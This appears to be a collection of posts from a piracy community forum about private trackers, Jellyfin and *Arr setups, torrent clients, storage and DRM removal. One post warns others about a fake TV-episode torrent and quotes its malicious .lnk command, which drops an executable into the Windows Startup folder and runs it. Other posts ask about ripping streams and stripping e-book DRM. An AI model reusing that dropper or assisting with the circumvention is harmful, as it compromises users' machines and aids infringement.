@Piracy: ꜱᴀɪʟ ᴛʜᴇ ʜɪɢʜ ꜱᴇᴀꜱ I've been using rutracker so far for multichannel music (5.1 etc.) but was wondering if there are better dedicated private tracker for multichannel/high quality music?

This marks the first release of the app since 2022! Read more about the update and obstacles we overcame to make this happen in the blog post.

Call me paranoid but why do the staff on a lot of private trackers seem so interested in what other trackers you have accounts with?

Most of the time when you apply with a new tracker or have to re-apply due to inactivity it feels like you're being interrogated by the feds.

From the perspective of a private tracker, why are they so pushy about that? And can they know if you're lying?

The implication seems like, "we all talk to each other and if you lie to me you lose all of your accounts".

Good day, I used to use the Filecrypt extractor tampermonkey script https://update.greasyfork.org/scripts/414903/FileCrypt%20Extractor.user.js to get a list of links out of filecrypt pages. Unfortunately it doesn't work anymore. Does anyone know an alternative other than dCrypt?

I know YouTube is a terrible provider of pirated content and also that it is almost impossible to pirate without a VPN, but I would like to know: if I download a movie from YouTube (directly from it, of course) without a VPN, will I receive "that type of message" from my ISP?

Been out of the piracy scene for a bit, maybe about 6 months to a year, as I basically have been good with the streaming services I already sign up for. But this past week I've rebuilt my setup (my mini server died), and tested it by trying to torrent something yesterday just to make sure I still can, and I noticed Torrent Galaxy was down. Then I saw some articles that it's been down a lot lately. Does anyone know what's going on? Or was it fine and it was just something on my side, like a DNS issue?

I hope it's fine because that was the best public tracker I knew. For example, the show I was looking for to test my setup with couldn't be found on 1337x (TPB ended up coming through but I don't trust that site as much as I used to). Are they really cracking down on public tracker indexes right now? Have any good alternatives popped up yet? Is there anything we as a community can do to get around or resist these efforts?

I'm not even a diehard pirate, I like the efficiency and user friendliness of paid services or products, I just like it to be an option when I want to punish companies for customer unfriendliness (ex: I stopped paying for Netflix when they prevented sharing outside of household), and without public trackers the hobby feels too niche and exclusive.

This is the link to a free trial video: https://plus.rtl.de/video-tv/serien/die-unvermittelbaren-mit-martin-ruetter-882892/staffel-2-930427/episode-6-das-grosse-wiedersehen-932203

The browser log shows a bunch of request for different .m4s files. I assume the premium stuff would behave the same but I would like to know if I can rip that before I go for a trial version

When I download games from FitGirl (using qBittorrent and Mullvad) it wont seed. When I download Movies/Music it always seeds. Is FitGirl not taking Seeds or is there a problem with Mullvad? Thanks in advance, I dont want to be a leech and want to make sure I do my part.

I want to be able to understand how to setup a Jellyfin Media Server stack. I get the general gist of some of the tools and know how to use qBittorent with Express VPN bound to it and barely got a basic Jellyfin server setup and connected to my Smart TV but that's where my knowledge ends.

I've read there is so much more that can be done with the *Arrs, Docker, Jellyfin Plug-Ins and other tools but so many resources I look into are geared towards Linux not Windows so it gets confusing.

I'm looking for references to "Noob" guides for setting EVERYTHING up from square one. Things like how to layout your data effectively, understanding and using Docker for Windows if appropriate, best settings for the programs, essential Jellyfin plug-ins, renaming & scraping data for files, how manually downloaded torrent files are handled, if a stack can handle "ripped" files, etc.

Any helpful guidance would be most appreciated. Thanks kindly!

tl;dr (even this is long ug): need halp from my fellow anarchists (~5-10) who happen to also share content with the world! Read the requirements section and then post a response. I figured this was the best place to reach out, I checked in with @db0@lemmy.dbzer0.com before posting, and we didnt have a better idea for a comm so here I am. =)

For those who volunteer and help, I'll be giving a much more detailed overview of how the system will work and what each part will do and why.

Some of the details about how the system will work that I'll be giving those selected, I'd appreciate being kept confidential. I want you informed but I also would appreciate the ability to surprise and delight everyone when things are released and to build the system at my pace without worry especially in the initial year while I get the base features working.

Requirements

  1. you've been a member lemmy.dbzer0.com community for 3+ months. (this isnt strict but i will be checking)
  2. willing to keep the system details confidential. I'll be explicit about which and why.
  3. reply with 'I'm Interested' and include some information about you.
  4. you dont need to include your technical / work information like I did. That information is relevant from me because I'm building the software and its directly applicable.
  5. by responding with an assertion of your interest you're asserting you fit the bill. your post is a vibe check, be weird, lord knows I fucking am.
  6. you run linux, It'll support macosx/windows eventually just not there yet.
  7. confident in self hosting / linux administration. while I plan on stream lining everything for the general usage its early yet.
  8. are familiar with torrenting ecosystems.
  9. able to safely setup and run a torrent client for whatever you're using it for.
  10. comfortable with buggy software. im literally building the ship while sailing.
  11. comfortable with slow update processes come august when my sabbatical ends.
  12. comfortable with software that will require a full state resets as it evolves. I'll obviously try to minimizes these but there is a whole storage layer aspect I'll need to get to at some point that will require a backup and restore.

Why I'm doing this

  • primarily the rise of fascism is going to require non-techy and user friendly anonymous media distribution.
  • I believe most (all?) the media platforms on the market are exploitative instead of communal and they suffer as a result.
  • I've been extremely bored technically lately.
  • I need (emotionally) to be able to do the crazy ideas I have in a number of areas in ML/distributed systems/security.
  • I'm tired of my technical know how being used to build things I dislike/disapprove of.
  • no company/investors are willing to pay me to do this, since they highly dislike not having control of an ecosystem, see the exploitative comments above.
  • I want people and content producers to have a space to share together that's mutually beneficial: producers give up their content to the system and get paid on an ongoing basis. Consumers provide the distribution (free tier), and capital (subscription which enables at cost storage feature) that support everything. The worker collective will be able to fund off the margins.

a little about me:

  • I'm a principal engineer specializing in non-linear dynamic systems. (systems that function off random processes in lay terms, its essentially the math that underpins the intersection of crypto/AI/distributed computing)
  • I primarily work in startups helping companies go from ideation to real world working systems.
  • I dabble in biochemistry and medicine. (currently picking up a BSN for humanitarian work).
  • I'm heavily neurodivergent, I was literally one of the case studies children in the 90s for research. take that as you will.
  • I enjoy taking things apart to see how they tick. if its a system that does something interesting I literally devour information about it...
  • I love niche communities, you'll find me in my home town palling around with the LGBTQ+, fetish groups and often in drag on relevant holidays or just to fuck with people. You won't see pictures of me in tights with a riced linux system though. ;)

What I'm building

  • a media player that has torrent protocol builtin implements bep51 for content discovery, rss feeds.
  • tracker agnostic. use whatever tracker you want.
  • will be daily usable by EO july, but the more complicated stuff will be later.
  • the daemon / UX code will be released under AGPL v3 for personal use post this private alpha/beta. No commercial use will be permitted with the single exception of the non-profit I'll be founding as an entity at some point. the non profit will be a worker collective.
  • will have a flatpak/debian/pacman installer, in flatpak its containerized essentially by default but will support native package manager installs.
  • is efficient of resource utilization. I want it to run efficiently on something like the raspberry pi. its not there yet obviously and some of the initial models won't.
  • builtin user space VPN client, wireguard protocol, not implemented yet, hopefully by end of year. which means essentially it can setup a VPN inside its program memory space without affecting your entire system and will work with any wireguard VPN provider.
  • personalized content filtering. everything here is controlled client side. nothing is uploaded anywhere. but it'll have builtin filters for content genres, NSFW, etc.
  • ability to stream your archived to devices, including mobile, while away from home.
  • anonymous recommendations from your peer network (people in the network you subscribe to essentially, but you wont know who it came from) providing virality of content discovery without allowing abuses by larger players in the ecosystem. nothing is sent off your device for this.

the hard part of what I plan on building (1-2yr for everything I think):

  • everything below here is opt in. But the storage alone will make it worth while.
  • the system Im imagining is designed so only the verified content publishers will be able to determine how much time you've spent watching their particular content. and only the metadata for these providers will be sent off your device to my systems by default. The system will only be able to de-anonymize this metadata during the monthly payout to those producers.
  • primarily these things are to fund the content creators, if my idea works 100% of the subscription costs (less the damn fees for the processing) will be given to the content providers in the system. however that requires a minimum number of users before thats possible.

Opt-in subscription tiers

I have a bunch of ideas planned and they're mostly self funding. the subscriptions (long term) are primarily to do payouts to content creators. but initially until economics of scale kick in at 1k subscribers at the base tier will let me do this full time.

  • no min seeding ratio in the the default DHT for the application.
  • publishing tooling for creators to upload and distribute their content to swarms.
  • tiers (probably range from $3-$12/month). There are forces outside my control on the floor here (processing fees, ug) but its around $1.
  • E2E encrypted cloud storage for files at cost. Only you will be able to retrieve this content. no distribution from the applications systems. basically this is for backups and long term storage.
  • automatic subbing/dubbing client side. any models used / built for this will be 100% open sourced.

Opt-in profit shared advertisements

Two things here, first this requires a user base to be effective, so I dont plan anything here for awhile. Second, I hate ads to, primarily because they are almost never relevant to me. On the other hand informational distribution is important. I'd love to see ads for the specific stuff I want to see. My plans here for the profit sharing will ideally be between you the person who saw the ad and publisher the content you watched that month, but i'm not leaving out a small portion going to the non-profit atm, especially initially.

  • Im hoping to be able to hit 95-98% of the ads value will be credited to you. 2% to the content creators.
  • you'll be able to directly tailor what you see.
  • Im hoping to focus on concerts/festivals/local local community events primarily.

I have Sonarr and Radarr set up to keep me up to date on some TV shows. Lately I've gotten a handful of files that Sonarr refuses to import because of a .lnk file. The download consists of a folder with the name of the file I want. Inside the folder is a file with the same name, and a .lnk extension. The .lnk file is very big (950Mb), and programmed to run this script:

%ComSpec% /v:On/CSET el=Severance.S02E07.1080p.WEB.H264-SuccessfulCrab.mkv&SET c="%Appdata%\microsoft\windows\START MENU\PROGRAMS\STARTUP%Username%.exe"&(If not exist !c! Findstr/v "cmd.EXE Rj%TIME:~7,1%%TIME:~-2%" !el!.Lnk>!c!&Start "" !c!)&CD %tmp%&Echo.>!

As far as I can tell, this creates an empty executable file in your Windows startup folder, and copies a portion of the fake video file into it. It then runs the malware. And, since it's in your startup folder, it will run again every time you reboot.

The tracker is theRARBG, but it could also come from elsewhere. I've found it on a couple of different shows (not just this one), and they always download a couple of days before the airdate.

Be careful!

Yarr me mateys!

~~Arrr, be ye askin' if it be true that the megathread be the community edition o' the thread, and it not be gettin' the proper swabbin' o' the decks, eh? In other words, be the community edition o' the thread bein' left to rot, without any landlubbers to keep it ship-shape?~~

Just wanted say I really appreciate the community here, and love that there is a lemmy community edition of the megathread, but was wondering if it is being maintained? It seems that the last update was in october, while the old megathread upkept by reddit's piracy community seems to be more recent.

I don't know if the old megathread is any better regarding the links, just asking if there are any people with access to community wiki that are keeping an eye on it and updating links?

I'm sorry that I myself am not active editor, I understand that we who are not on dbzer0 lemmy instance don't really have edit access on the wiki.

Arrr, thanks to ye, matey, and may the winds o' fortune blow in yer favor, givin' ye a grand day ahead!

Ahoy mateys! I've been doing some research into getting a self-hosted streaming setup built, and I'd like to ask the knowledgeable folks here for advice as well.

My goal is to be running a server that can host a jellyfin stack for acquiring and streaming media for myself and my partner. (I'd like to also run a matrix chat server on it for us to have secure chats as well, but I think that'll be less of a hassle. I hope...)

I found a few guides that don't seem too out of date. I'm an experienced full stack software dev, so the idea of running some docker containers and doing a little command line server set up doesn't intimidate me.

These guides though, they just cover the software application set up mainly. I also need to know:

  • Where should I host at? I'm on a shitty 5G internet at home, so VPS seems like the way to go but with who? What are some good secure hosts that aren't super expensive? Considering Hetzner auctions maybe? Anyone used them?
  • Will I need a VPN on the server too? If I'm torrenting, do I need to be careful which hosts I choose so I don't get copyright pinged?
  • Is there a good guide for securing and hardening my server? I'd like my partner and i to have easy access from home or on our mobiles, but I also don't want to find out my box is suddenly mining crypto because I forgot to close one port. I don't know what gotchas to be looking out for.
  • Any other guides you'd recommend? Any must have software or sites to know about?

Thanks in advance!

I'm pretty sure. I think. I can't find a core2.dat in my Linux filesystem so i assume it works some other way, and therefore it's cooked.

The reason i want to do this is because transplanting core2.dat is what you usually do to recover your settings and transfers. I this case though i've installed it on my Linux PC so i don't think this is going to work.

I've resorted to exporting all magnets and re-importing them, but that has a few drawbacks.

I'll update if i find better solutions. So far, if you want to transfer your Tixati from Windows to Linux, my advice is probably don't

UPDATE: with help in this thread, i've figured it out. Here's a summary for future reader convenience.

You use the Import Export feature, honestly i don't know why i ever transplanted core2.dat when this is available. It saves everything, including stats such as Created, Completed, Bits uploaded, Ratio, etc

Now file paths in Linux start with /media instead of starting with D: so all the file location settings will be broken; you have to rebind them. If, like me, you had all your torrents sorted into folders, that's a pain because now you have to do them all one by one. Maybe it's better to move them all into one folder while still in Windows.

At this point i got some “error file missing” for no reason, force checking fixed all of that.

Another problem i had is that some transfers that were 100% became 99%. That, i believe, is due to file corruption. The same transfers also had the same problem in Windows with nothing changed so i don't think they were broken by the process above. It sucks, only solution i can think of is to hope someone comes around and seeds them, which isn't going to happen for me and my hoard of dead torrents.

It occurs to me that the import/export feature of Tixati outputs a file, and you can probably edit that file to your convenience before inputting it back into Tixati. You can edit the file paths right there, but you can't fix the 99% torrents because they'll be revealed as broken the moment you make them seed.

That's all in know on this topic, good luck

Seems like many are moving towards LCP in the future for e-books. But last I heard the NoDRM gang had to exclude the LCP DeDRM from the Calibre plugin due to legal issues (GitHub), and either way it was for an older version of LCP so it wouldn't work nowadays. Do you think someone will come up with a way to DeDRM these?

Internet Archive moving towards LCP as well

Since some Lemmy users have asked me via DM and also searched my other socials to ask me about my old bypass I thought I'd share my new one with Lemmy too.

I also uploaded the source in case anyone wants to look at it (or even extend it, who knows).

Sorry for the extraordinary wait.

Edit: Removed most of the post and added git link.

My desktop hard drives are maxing out & I'm seeking some type of external storage expansion for my PC which I run a Jellyfin server on. This would be for storing my torrent data and also working towards a 3-2-1 backup solution equivalent to about ~10-20Tbs of storage space, maybe more.

I'm leaning towards an enclosure type of setup with several ~10-12Tbs HDDs in it of which one would be removed after complete backup and stored offsite as part of the 3-2-1 strategy but I'm not sure. I'd need something very simple to work with as I'm not very Hardware-literate.

Also, I am finding it difficult to find a reliable Cloud service, again as part of the 3-2-1 scheme except maybe Filen which seems to have good reviews on TrustPilot

Any positive suggestions on how to store & access large amounts of data safely for a long period of time & appropriate hardware/software to do so would be most appreciated. Thanks!

Thanks Kindly!

GitHub's latest transparency report reveals that the company received 2,000 valid DMCA takedown notices last year, resulting in the removal of over 31,151 projects. Targeted repositories included copied code, but also pirate apps, IPTV playlists, and many Nintendo Switch emulators. Circumvention takedowns increased slightly, but GitHub notes that these continue to be heavily scrutinized.
